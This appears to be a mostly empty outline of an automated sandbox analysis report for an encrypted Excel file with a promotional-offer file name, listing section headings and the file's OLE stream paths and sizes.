Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1253128

General